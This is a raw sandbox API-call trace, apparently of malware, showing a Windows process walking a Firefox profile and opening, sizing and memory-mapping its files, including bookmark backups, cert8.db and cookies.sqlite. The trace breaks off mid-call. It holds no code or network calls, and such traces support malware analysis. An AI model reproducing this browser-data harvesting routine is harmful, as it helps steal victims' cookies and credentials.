(lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0589.660] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5a1300 [0589.660] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.660] lstrlenW (lpString="\\*.*") returned 4 [0589.660] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.660] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5500d0 [0589.660] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 0x57d1e0 [0589.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.660] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.660] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.660] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.660] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.660] lstrlenW (lpString="\\") returned 1 [0589.660] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.660] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.660] lstrlenW (lpString="addons.json") returned 11 [0589.660] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.660] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578b10 [0589.660] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.660] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.660] CloseHandle (hObject=0x5ac) returned 1 [0589.660] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.660] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59a8a0 [0589.660] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x59a8a0, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0589.660] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.660] CloseHandle (hObject=0x5ac) returned 1 [0589.660] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.661] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0589.661] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.661] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.661] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.661] CloseHandle (hObject=0x4c8) returned 1 [0589.661] CloseHandle (hObject=0x5ac) returned 1 [0589.661] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.661] LocalFree (hMem=0x578b10) returned 0x0 [0589.661] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.661] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0589.661] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0589.661] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.661] lstrlenW (lpString="\\") returned 1 [0589.661] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.661] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.661] lstrlenW (lpString="bookmarkbackups") returned 15 [0589.661] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.661] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0589.661] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.661] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.661] lstrlenW (lpString="\\*.*") returned 4 [0589.661] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.661] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.661] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.662] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.662] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.662] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.662] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.662] lstrlenW (lpString="\\") returned 1 [0589.662] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.662] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.662] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0589.662] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.662] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x59a8a0 [0589.662] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.662] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.662] CloseHandle (hObject=0x4c8) returned 1 [0589.662] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.662] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578b10 [0589.662] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x578b10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0589.662] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.662] CloseHandle (hObject=0x4c8) returned 1 [0589.662] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.662] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.662] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.662] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.662] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.663] CloseHandle (hObject=0x660) returned 1 [0589.663] CloseHandle (hObject=0x4c8) returned 1 [0589.663] LocalFree (hMem=0x578b10) returned 0x0 [0589.663] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.663] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.663] lstrlenW (lpString="\\") returned 1 [0589.663] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.663] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.663] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0589.663] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.663] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x59a8a0 [0589.663] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.663] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.663] CloseHandle (hObject=0x4c8) returned 1 [0589.663] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.663] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578b10 [0589.663] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x578b10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0589.663] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.663] CloseHandle (hObject=0x4c8) returned 1 [0589.663] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0589.663] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.663] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0589.663] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.664] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.664] CloseHandle (hObject=0x660) returned 1 [0589.664] CloseHandle (hObject=0x4c8) returned 1 [0589.664] LocalFree (hMem=0x578b10) returned 0x0 [0589.664] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.664] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.664] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.664] LocalFree (hMem=0x56c300) returned 0x0 [0589.664] LocalFree (hMem=0x56afc8) returned 0x0 [0589.664] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.664] lstrlenW (lpString="\\") returned 1 [0589.664] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.664] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.664] lstrlenW (lpString="cert8.db") returned 8 [0589.664] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.664] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578b10 [0589.664] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.664] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.664] CloseHandle (hObject=0x5ac) returned 1 [0589.664] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0589.664] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x59a8a0 [0589.664] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x59a8a0, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0589.664] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.664] CloseHandle (hObject=0x5ac) returned 1 [0589.664] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.664] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.664] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.665] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.665] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.665] CloseHandle (hObject=0x4c8) returned 1 [0589.665] CloseHandle (hObject=0x5ac) returned 1 [0589.666] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.666] LocalFree (hMem=0x578b10) returned 0x0 [0589.666] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.666] lstrlenW (lpString="\\") returned 1 [0589.666] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.666] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.666] lstrlenW (lpString="compatibility.ini") returned 17 [0589.666] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.666] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.666] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.666] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.666] CloseHandle (hObject=0x5ac) returned 1 [0589.666] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.666] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.666] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0589.666] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.666] CloseHandle (hObject=0x5ac) returned 1 [0589.666] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.666] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0589.666] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.666] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.666] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.667] CloseHandle (hObject=0x4c8) returned 1 [0589.667] CloseHandle (hObject=0x5ac) returned 1 [0589.667] LocalFree (hMem=0x56c300) returned 0x0 [0589.667] LocalFree (hMem=0x56afc8) returned 0x0 [0589.667] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.667] lstrlenW (lpString="\\") returned 1 [0589.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.667] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.667] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0589.667] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.667] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x578b10 [0589.667] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.667] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.667] CloseHandle (hObject=0x5ac) returned 1 [0589.667] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.667] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x59a8a0 [0589.667] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x59a8a0, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0589.667] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.667] CloseHandle (hObject=0x5ac) returned 1 [0589.667] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.667] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0589.667] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.667] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.668] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.670] CloseHandle (hObject=0x4c8) returned 1 [0589.670] CloseHandle (hObject=0x5ac) returned 1 [0589.670] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.670] LocalFree (hMem=0x578b10) returned 0x0 [0589.670] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.670] lstrlenW (lpString="\\") returned 1 [0589.670] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.670] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.670] lstrlenW (lpString="cookies.sqlite") returned 14 [0589.670] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.670] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.670] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.670] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.670] CloseHandle (hObject=0x5ac) returned 1 [0589.670] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.670] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.670] ExpandEnvironmentStringsW (in: 